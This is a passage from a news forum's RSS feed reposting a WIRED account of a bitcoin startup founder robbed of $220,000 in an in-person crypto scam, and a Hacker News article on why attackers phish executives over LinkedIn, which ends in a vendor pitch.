	Even asked Halliburton to return to Amsterdam to sign the contracts necessary to finalize the deal. Having been away from his family for weeks, Halliburton protested. But Even drew a line in the sand: “Remotely doesn’t work for me that’s not how I do business at the moment,” he wrote in a text message reviewed by WIRED.
</p>

<p>
	 
</p>

<p>
	Halliburton arrived back in Amsterdam in the early afternoon on August 16. That evening, he was due to meet Maxim at a teppanyaki restaurant at the five-star Okura Hotel. The interior is elaborately decorated in traditional Japanese style; it has wooden panelling, paper walls, a zen garden, and a flock of origami cranes that hang from string down a spiral staircase in the lobby.
</p>

<p>
	 
</p>

<p>
	Halliburton found Maxim sitting on a couch in the waiting area outside the restaurant, dressed in a gaudy silver suit. As they waited for a table, Maxim asked Halliburton whether he could demonstrate that Sazmining held enough bitcoin to go through with the side transaction that Even had proposed. He wanted Halliburton to move roughly half of the agreed amount—worth $220,000—into a bitcoin wallet app trusted by the family office. The funds would remain under Halliburton’s control, but the family office would be able to verify their existence using public transaction data.
</p>

<p>
	 
</p>

<p>
	Halliburton thumbed open his iPhone. The app, Atomic Wallet, had thousands of positive reviews and had been listed on the Apple App Store for several years. With Maxim at his side, Halliburton downloaded the app and created a new wallet. “I was trying to earn this guy’s trust,” says Halliburton. “Again, a $4 million contract. I’m still looking at that carrot.”
</p>

<p>
	 
</p>

<p>
	The dinner passed largely without incident. Maxim was less guarded this time; he talked about his fondness for watches and his work sourcing deals for the family office. Feeling under the weather from all the travel, Halliburton angled to wrap things up.
</p>

<p>
	 
</p>

<p>
	They left with the understanding that Maxim would take the signed contracts to the family office to be executed, while Halliburton would send the $220,000 in bitcoin to his new wallet address as agreed.
</p>

<p>
	 
</p>

<p>
	Back in his hotel room, Halliburton triggered a small test transaction using his new Atomic Wallet address. Then he wiped the wallet and restored it from the private credentials, the seed phrase, generated when he first downloaded the app, to make sure that it functioned as expected. “Had to take some security measures but almost ready. Thanks for your patience,” wrote Halliburton in a WhatsApp message to Even. “No worries take your time,” Even responded.
</p>

<p>
	 
</p>

<p>
	At 10:45 pm, satisfied with his tests, Halliburton signaled to a colleague to release $220,000 worth of bitcoin to the Atomic Wallet address. When it arrived, he sent a screenshot of the updated balance to Even. One minute later, Even wrote back, “Thank yiu [sic].”
</p>

<p>
	 
</p>

<p>
	Halliburton sent another message to Even, asking about the contracts. Though previously quick to answer, Even didn’t respond. Halliburton checked the Atomic Wallet app, sensing that something was wrong. The bitcoin had vanished.
</p>

<p>
	 
</p>

<p>
	Halliburton’s stomach dropped. As he sat on the bed, he tried to stop himself from vomiting. “It was like being punched in the gut,” says Halliburton. “It was just shock and disbelief.”
</p>

<p>
	 
</p>

<p>
	Halliburton racked his brain trying to figure out how he had been swindled. At 11:30 pm, he sent another message to Even: “That was the most sophisticated scam I’ve ever experienced. I know you probably don’t give a shit but my business may not survive this. I’ve worked four years of my life to build it.”
</p>

<p>
	 
</p>

<p>
	Even responded, denying that he had done anything wrong, but that was the last Halliburton heard from him. Halliburton provided WIRED with the Telegram account Even had used; it was last active on the day the funds were drained. Even did not respond to a request for comment.
</p>

<p>
	 
</p>

<p>
	Within hours, the funds drained from Halliburton’s wallet began to be divided up, shuffled through a web of different addresses, and deposited with third-party platforms for converting crypto into regular currency, analysis by blockchain analytics companies Chainalysis and CertiK shows.
</p>

<p>
	 
</p>

<p>
	A portion of the bitcoin was split between different instant exchangers, which allow people to swap one type of cryptocurrency for another almost instantaneously. The bulk was funneled into a single address, where it was blended with funds tagged by Chainalysis as the likely proceeds of rip deals, a scam whereby somebody impersonates an investor to steal crypto from a startup.
</p>

<p>
	 
</p>

<p>
	“There’s nothing illegal about the services the scammer leveraged,” says Margaux Eckle, senior investigator at Chainalysis. “However, the fact that they leveraged consolidation addresses that appear very tightly connected to labeled scam activity is potentially indicative of a fraud operation.”
</p>

<p>
	 
</p>

<p>
	Some of the bitcoin that passed through the consolidation address was deposited with a crypto exchange, where it was likely swapped for regular currency. The remainder was converted into <a href="https://www.wired.com/story/genius-act-congress-crypto-law-passes/" rel="external nofollow">stablecoin</a> and moved across so-called bridges to the Tron blockchain, which hosts several over-the-counter trading services that can be readily used to cash out large quantities of crypto, researchers claim.
</p>

<p>
	 
</p>

<p>
	The effect of the many hops, shuffles, conversions, and divisions is to make it more difficult to trace the origin of funds, so that they can be cashed out without arousing suspicion. “The scammer is quite sophisticated,” says Eckle. “Though we can trace through a bridge, it’s a way to slow the tracing of funds from investigators that could be on your tail.”
</p>

<p>
	 
</p>

<p>
	Eventually, the trail of public transaction data stops. To identify the perpetrators, law enforcement would have to subpoena the services that appear to have been used to cash out, which are widely required to collect information about users.
</p>

<p>
	 
</p>

<p>
	From the transaction data, it’s not possible to tell precisely how the scammers were able to access and drain Halliburton’s wallet without his permission. But aspects of his interactions with the scammers provide some clue.
</p>

<p>
	 
</p>

<p>
	Initially, Halliburton wondered whether the incident might be connected to a <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.elliptic.co/blog/analysis/north-korea-linked-atomic-wallet-heist-tops-100-million" href="https://www.elliptic.co/blog/analysis/north-korea-linked-atomic-wallet-heist-tops-100-million" rel="external nofollow" target="_blank">2023 hack</a> perpetrated by threat actors <a href="https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom" rel="external nofollow">affiliated</a> with the North Korean government, which led to $100 million worth of funds being drained from the accounts of Atomic Wallet users. (Atomic Wallet did not respond to a request for comment.)
</p>

<p>
	 
</p>

<p>
	But instead, the security researchers that spoke to WIRED believe that Halliburton fell victim to a targeted surveillance-style attack. “Executives who are publicly known to custody large crypto balances make attractive targets,” says Guanxing Wen, head of security research at CertiK.
</p>

<p>
	 
</p>

<p>
	The in-person dinners, expensive clothing, reams of cash and other displays of wealth were gambits meant to put Halliburton at ease, researchers theorize. “This is a well-known rapport-building tactic in high-value confidence schemes,” says Wen. “The longer a victim spends with the attacker in a relaxed setting, the harder it becomes to challenge a later technical request.”
</p>

<p>
	 
</p>

<p>
	In order to complete the theft, the scammers likely had to steal the seed phrase for Halliburton’s newly created Atomic Wallet address. The seed phrase deterministically generates every private key the wallet will ever use, so anyone who has seen it once can reconstruct the wallet on their own device and spend whatever is sent to its addresses, without ever touching the victim’s phone again.
</p>

<p>
	 
</p>

<p>
	One possibility is that the scammers, who dictated the locations for both meetings in Amsterdam, hijacked or mimicked the hotel Wi-Fi networks, allowing them to intercept or tamper with traffic from Halliburton’s phone. “That equipment you can buy online, no problem. It would all fit inside a couple of suitcases,” says Adrian Cheek, lead researcher at cybersecurity company Coeus. A seed phrase is generated on the device and is never sent over the network, though, so a rogue access point alone would only have helped if it also let the attackers tamper with what the phone downloaded. And Halliburton insists that his phone never left his possession, and he used mobile data to download the Atomic Wallet app, not public Wi-Fi.
</p>

<p>
	 
</p>

<p>
	The most plausible explanation, claims Wen, is that the scammers—perhaps with the help of a nearby accomplice or a camera equipped with long-range zoom—were able to record the seed phrase when it appeared on Halliburton’s phone at the point he first downloaded the app, on the couch at the Okura Hotel.
</p>

<p>
	 
</p>

<p>
	Long before Halliburton delivered the $220,000 in bitcoin to his Atomic Wallet address, the scammers had probably set up a “<a href="https://support.metamask.io/stay-safe/safety-in-web3/sweeper-bots-scripts" rel="external nofollow">sweeper script</a>,” claims Wen, a type of automated bot coded to drain a wallet when it detects a large balance change.
</p>

<p>
	 
</p>

<p>
	The people the victim meets in person in cases like this—like Even and Maxim—are rarely the ultimate beneficiaries, but rather mercenaries hired by a network of scam artists, who could be based on the other side of the globe.
</p>

<p>
	 
</p>

<p>
	“They’re normally recruited through underground forums, and secure chat groups,” says Cheek. “If you know where you’re looking, you can see this ongoing recruitment.”
</p>

<p>
	 
</p>

<p>
	<span class="lead-in-text-callout">For a few</span> days, it remained unclear whether Sazmining would be able to weather the financial blow. The stolen funds equated to about six weeks’ worth of revenue. “I’m trying to keep the business afloat and survive this situation where suddenly we’ve got a cash crunch,” says Halliburton. By delaying payment to a vendor and extending the duration of an outstanding loan, the company was ultimately able to remain solvent.
</p>

<p>
	 
</p>

<p>
	That week, one of the Sazmining board members filed reports with law enforcement bodies in the Netherlands, the UK, and the US. They received acknowledgements only from the UK-based Action Fraud, which said it would take no immediate action, and from the Cyber Fraud Task Force, a division of the US Secret Service. (The CFTF did not respond to a request for comment.)
</p>

<p>
	 
</p>

<p>
	The incredible volume of crypto-related scam activity makes it all but impossible for law enforcement to investigate each theft individually. “It’s a type of threat and criminal activity that is reaching a scale that’s completely unprecedented,” says Eckle.
</p>

<p>
	 
</p>

<p>
	The best chance of a scam victim recovering their funds is for law enforcement to bust an entire scam ring, says Eckle. In that scenario, any funds recovered are typically disbursed to those who have reported themselves as victims.
</p>

<p>
	 
</p>

<p>
	Until such a time, Halliburton has to make his peace with the loss. “It’s still painful,” he says. But “it wasn’t a death blow.”
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/bitcoin-scam-mining-as-service/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 18 November 2025 at 2:41 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32497</guid><pubDate>Mon, 17 Nov 2025 16:42:30 +0000</pubDate></item><item><title>5 Reasons Why Attackers Are Phishing Over LinkedIn</title><link>https://nsaneforums.com/news/security-privacy-news/5-reasons-why-attackers-are-phishing-over-linkedin-r32490/</link><description><![CDATA[<p>
	Phishing attacks are no longer confined to the email inbox, with 1 in 3 phishing attacks now taking place over non-email channels like social media, search engines, and messaging apps.
</p>

<p>
	 
</p>

<p>
	LinkedIn in particular has become a hotbed for phishing attacks, and for good reason. Attackers are running sophisticated spear-phishing attacks against company executives, with recent campaigns seen targeting enterprises in financial services and technology verticals.
</p>

<p>
	 
</p>

<p>
	But phishing outside of email remains severely underreported — not exactly surprising when we consider that most of the industry's phishing metrics come from email security tools.
</p>

<p>
	 
</p>

<p>
	Your initial thought might be "why do I care about employees getting phished on LinkedIn?" Well, while LinkedIn is a personal app, it's routinely used for work purposes, accessed from corporate devices, and attackers are specifically targeting business accounts like Microsoft Entra and Google Workspace.
</p>

<p>
	 
</p>

<p>
	So, LinkedIn phishing is a key threat that businesses need to be prepared for today. Here are 5 things you need to know about why attackers are going phishing on LinkedIn — and why it's so effective.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>1: It bypasses traditional security tools</strong></span>
</p>

<p>
	 
</p>

<p>
	LinkedIn DMs completely sidestep the email security tools that most organizations rely on for phishing protection. In practice, employees access LinkedIn on work laptops and phones, but security teams have no visibility into these communications. This means that employees can be messaged by outsiders on their work devices without any risk of email interception.
</p>

<p>
	 
</p>

<p>
	To make matters worse, modern phishing kits use an array of obfuscation, anti-analysis, and detection evasion techniques to get around anti-phishing controls based on the inspection of a webpage (such as web crawling security bots) or analysis of web traffic (such as a web proxy). This leaves most organizations relying on user training and reporting as their main line of defense — not a great situation.
</p>

<p>
	 
</p>

<p>
	But even when spotted and reported by a user, what can you really do about a LinkedIn phish? You can't see which other accounts were targeted or hit in your user base. Unlike email, there's no way to recall or quarantine the same message hitting multiple users. There's no rule you can modify, or senders you can block. You can report the account, and maybe the malicious account will get frozen — but the attacker has probably got what they needed by then and moved on.
</p>

<p>
	 
</p>

<p>
	Most organizations simply block the URLs involved. But this doesn't really help when attackers are rapidly rotating their phishing domains — by the time you block one site, several more have already taken its place. It's a game of whack-a-mole — and it's rigged against you.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>2: It's cheap, easy, and scalable for attackers</strong></span>
</p>

<p>
	 
</p>

<p>
	There are a couple of things that make phishing over LinkedIn more accessible than email-based phishing attacks.
</p>

<p>
	 
</p>

<p>
	With email, it's common for attackers to create email domains in advance, going through a warm-up period to build up domain reputation and pass mail filters. The comparison with social media apps like LinkedIn would be creating accounts, making connections, adding posts and content, and dressing them up to appear legitimate.
</p>

<p>
	 
</p>

<p>
	Except it's incredibly easy to just take over legitimate accounts. 60% of credentials in infostealer logs are linked to social media accounts, many of which lack MFA (because MFA adoption is far lower on nominally "personal" apps where users aren't encouraged to add MFA by their employer). This gives attackers a credible launchpad for their campaigns, slotting into an account's existing network and exploiting that trust.
</p>

<p>
	 
</p>

<p>
	Combining the hijacking of legitimate accounts with the opportunity afforded by AI-powered direct messages means attackers can easily scale their LinkedIn outreach.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>3: Easy access to high-value targets</strong></span>
</p>

<p>
	 
</p>

<p>
	As any sales professional knows, LinkedIn recon is trivial. It's easy to map out an organization's LinkedIn profiles and select suitable targets to approach. In fact, LinkedIn is already a top tool for red teamers and attackers alike when scoping out potential social engineering targets — e.g. reviewing job roles and descriptions to estimate which accounts have the levels of access and privilege you need to launch a successful attack.
</p>

<p>
	 
</p>

<p>
	There's no screening or filtering of LinkedIn messages either, no spam protection, or assistant monitoring the inbox for you. It's arguably the most direct way to reach your intended contact, and therefore one of the best places to launch highly targeted spear-phishing attacks.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>4: Users are more likely to fall for it</strong></span>
</p>

<p>
	 
</p>

<p>
	The nature of professional networking apps like LinkedIn is that you expect to connect and interact with people outside of your organization. In fact, a high-powered executive is far more likely to open and respond to a LinkedIn DM than yet another spam email.
</p>

<p>
	 
</p>

<p>
	Particularly when combined with account hijacking, messages from known contacts are even more likely to get a response. It's the equivalent of taking over an email account for an existing business contact — which has been the source of many data breaches in the past.
</p>

<p>
	 
</p>

<p>
	In fact, in some recent cases, those contacts have been fellow employees — so it's more like an attacker taking over one of your company email accounts and using that to spear-phish your C-Suite execs. Combine this with the right pretext (e.g. seeking urgent approval, or reviewing a document) and the chance of success increases significantly.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>5: The potential rewards are huge</strong></span>
</p>

<p>
	 
</p>

<p>
	Just because these attacks are happening over a "personal" app doesn't mean the impact is limited. It's important to think about the bigger picture.
</p>

<p>
	 
</p>

<p>
	Most phishing attacks focus on core enterprise cloud platforms such as Microsoft and Google, or specialist Identity Providers like Okta. Taking over one of these accounts doesn't just give access to the core apps and data within the respective app, but also enables the attacker to leverage SSO to sign into any connected app that the employee logs into.
</p>

<p>
	 
</p>

<p>
	This gives an attacker access to just about every core business function and dataset in your organization. And from this point, it's also much easier to target other users of these internal apps — using business messaging apps like Slack or Teams, or techniques like SAMLjacking to turn an app into a watering hole for other users trying to log in.
</p>

<p>
	 
</p>

<p>
	Combined with spear-phishing executive employees, the payoff is significant. A single account compromise can quickly snowball into a multi-million dollar, business-wide breach.
</p>

<p>
	 
</p>

<p>
	And even if the attacker only manages to reach your employee on their personal device, this can still be laundered into a corporate account compromise. Just look at the 2023 Okta breach, where an attacker exploited the fact that an Okta employee had signed into a personal Google profile on their work device. This meant any credentials saved in their browser were synced to their personal device — including the credentials for 134 customer tenants. When their personal device got hacked, so did their work account.
</p>

<p>
	<br />
	<span><strong><span style="font-size:20px;">This isn't just a LinkedIn problem</span></strong></span>
</p>

<p>
	 
</p>

<p>
	With modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it's harder than ever to stop users from interacting with malicious content.
</p>

<p>
	 
</p>

<p>
	Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>Stop phishing where it happens: in the browser</strong></span>
</p>

<p>
	 
</p>

<p>
	Phishing has moved outside of the mailbox — it's vital that security does too.
</p>

<p>
	 
</p>

<p>
	To tackle modern phishing attacks, organizations need a solution that detects and blocks phishing across all apps and delivery vectors.
</p>

<p>
	 
</p>

<p>
	Push Security sees what your users see. It doesn't matter what delivery channel or detection evasion methods are used: Push shuts the attack down in real time, as the user loads the malicious page in their web browser — by analysing the page code, behavior, and user interaction in real time.
</p>

<p>
	 
</p>

<p>
	This isn't all we do: Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, and vulnerable passwords. You can even see where employees have logged into personal accounts in their work browser (to prevent situations like the 2023 Okta breach mentioned earlier).
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2025/11/5-reasons-why-attackers-are-phishing.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32490</guid><pubDate>Mon, 17 Nov 2025 13:59:49 +0000</pubDate></item></channel></rss>
